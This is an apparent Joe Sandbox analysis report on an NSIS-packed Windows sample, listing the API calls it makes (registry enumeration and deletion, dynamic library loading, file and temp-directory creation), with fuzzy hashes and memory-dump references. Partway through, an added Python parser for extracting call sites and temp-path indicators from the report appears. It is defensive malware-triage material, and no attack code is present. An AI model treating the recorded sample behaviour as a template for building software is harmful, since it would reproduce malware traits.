                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3356406503-0
                                                                                        • Opcode ID: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                                                        • Instruction ID: 8f3c8c2c6778634c6bf67ed2425ae169c6cf17cae75ec7db2a606e7394f4df6a
                                                                                        • Opcode Fuzzy Hash: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                                                        • Instruction Fuzzy Hash: 36118F71905205FEDB11CF64CA5D5AEBAB4AF15344F60447FE042B62C0D2B88A45DB2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

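The "APIs" blocks of the entries above (for example the FindFirstFileA/SHFileOperationA function, the RegEnumKeyA/RegEnumValueA function and the RegQueryValueExA function) all follow one line format: an optional "Part of subcall function XXXXXXXX:" prefix, Function.MODULE, an optional argument list, and the call-site address after "ref:". The following parser is an added example, not Joe Sandbox code; it assumes only the layout visible on this page (the "•" bullet, the "ref:" suffix and the "Memory Dump Source" header that closes each block), and the function names, the record class and the sample text (copied verbatim from those three entries) are mine. It turns the blocks into records, reports call sites that two entries share (here RegCloseKey at 004025A9 appears in both registry functions, so the two reported functions overlap), and pulls out the filesystem paths passed as arguments, which is how a triager would lift the nsz7A32.tmp NSIS temp path as a host indicator.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the "APIs" blocks of three function entries, copied
# verbatim from the report above. Each block runs from the "APIs" header to the
# "Memory Dump Source" header that follows it.
SAMPLE = r"""
APIs
  • Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(76403410,00421558,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
  • Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4
• lstrlenA.KERNEL32 ref: 004022F2
• lstrlenA.KERNEL32(00000000), ref: 004022FC
• SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324
Memory Dump Source
APIs
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
• RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402591
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
Memory Dump Source
APIs
• RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040250A
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
Memory Dump Source
"""

# One bullet of an APIs block (format as observed on this page, an assumption):
# optional "Part of subcall function XXXXXXXX:" prefix, Function.MODULE, an optional
# parenthesised argument list, and the call-site address after "ref:".
_API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

_PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class ApiCall:
    function: str
    module: str
    args: List[str]
    ref: str                    # call-site address inside the dumped image
    subcall_of: Optional[str]   # callee address when reported as "Part of subcall function"


def parse_api_entries(text: str) -> List[List[ApiCall]]:
    """Split the report text into one list of ApiCall records per function entry."""
    entries: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            continue
        if stripped == "Memory Dump Source":
            if current is not None:
                entries.append(current)
            current = None
            continue
        if current is None:
            continue
        m = _API_RE.match(line)
        if m is None:
            continue            # not a bullet we understand: skip rather than guess
        args = m.group("args").split(",") if m.group("args") else []
        current.append(ApiCall(m.group("fn"), m.group("mod"), args,
                               m.group("ref").upper(), m.group("sub")))
    return entries


def shared_refs(entries: List[List[ApiCall]]) -> dict:
    """Call sites listed under more than one function entry, keyed by ref address.
    A shared call site means the reported functions overlap (one falls through into the other)."""
    seen = defaultdict(set)
    for idx, calls in enumerate(entries):
        for c in calls:
            seen[c.ref].add(idx)
    return {ref: sorted(idxs) for ref, idxs in seen.items() if len(idxs) > 1}


def path_arguments(entries: List[List[ApiCall]]) -> List[str]:
    """Filesystem paths passed as call arguments, usable as host indicators."""
    return sorted({a for calls in entries for c in calls for a in c.args if _PATH_RE.match(a)})


def module_counts(entries: List[List[ApiCall]]) -> Counter:
    """How many resolved calls land in each module (KERNELBASE, ADVAPI32, ...)."""
    return Counter(c.module for calls in entries for c in calls)


if __name__ == "__main__":
    parsed = parse_api_entries(SAMPLE)
    for i, calls in enumerate(parsed):
        print(i, [f"{c.function}@{c.ref}" for c in calls])
    print("shared call sites:", shared_refs(parsed))
    print("path arguments:", path_arguments(parsed))
    print("modules:", dict(module_counts(parsed)))
```

Unrecognised bullets are skipped rather than guessed at, so a line the report renders differently will drop a record instead of producing a wrong one; check `len(entries)` against the number of "APIs" headers when running this over a full report.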
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                                                        • Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
                                                                                        • Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                                                        • Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402409
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteValue
                                                                                        • String ID:
                                                                                        • API String ID: 2831762973-0
                                                                                        • Opcode ID: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                                                        • Instruction ID: ce1450a8ab12a7957634bce685e0bfb7e2b45ee5234afc219fd3c41b35330c67
                                                                                        • Opcode Fuzzy Hash: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                                                        • Instruction Fuzzy Hash: AAF0F672E04120ABD700AFB89B4DAAE72A89B44304F11017BF202B72C1D5F85E02826E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 004051E3
                                                                                          • Part of subcall function 004040B4: SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004040C6
                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 0040522F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeMessageSendUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2896919175-0
                                                                                        • Opcode ID: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
                                                                                        • Instruction ID: c8a811e9c9fb5a5b15e00e8e17d8607129a9d45208e9b7412ec8ad736198a790
                                                                                        • Opcode Fuzzy Hash: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
                                                                                        • Instruction Fuzzy Hash: 82F0F0F6A00201BBEA606B40A801B1773B0EFD0702F00847EFF44B22E1D63D59028E6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStringslstrcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1938659011-0
                                                                                        • Opcode ID: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                                                        • Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
                                                                                        • Opcode Fuzzy Hash: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                                                        • Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableShow
                                                                                        • String ID:
                                                                                        • API String ID: 1136574915-0
                                                                                        • Opcode ID: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                                                        • Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
                                                                                        • Opcode Fuzzy Hash: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                                                        • Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                          • Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                                                          • Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
                                                                                          • Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 00406368
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2547128583-0
                                                                                        • Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                                                        • Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
                                                                                        • Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                                                        • Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                                        • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                                                                        • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                                        • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 0040564A
                                                                                        • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405658
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                                        • Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
                                                                                        • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                                        • Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • EnumWindows.USER32(00000000), ref: 6FE92AF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1129996299-0
                                                                                        • Opcode ID: d4b5dc4a6d7889e7f1b5427915a90e6abce2b1a1313bcd4dc064756468beadde
                                                                                        • Instruction ID: 5f74883ab25792b659ab64dbc6526c329443861eafc99937ac25902af91cd095
                                                                                        • Opcode Fuzzy Hash: d4b5dc4a6d7889e7f1b5427915a90e6abce2b1a1313bcd4dc064756468beadde
                                                                                        • Instruction Fuzzy Hash: 5F414172504704EFDF20DFA4D981B593FB5FB66368F30842BE514C6290E736A8A18B72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2111968516-0
                                                                                        • Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                                                        • Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
                                                                                        • Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                                                        • Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
  • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
• Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
• Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
• Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
• Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
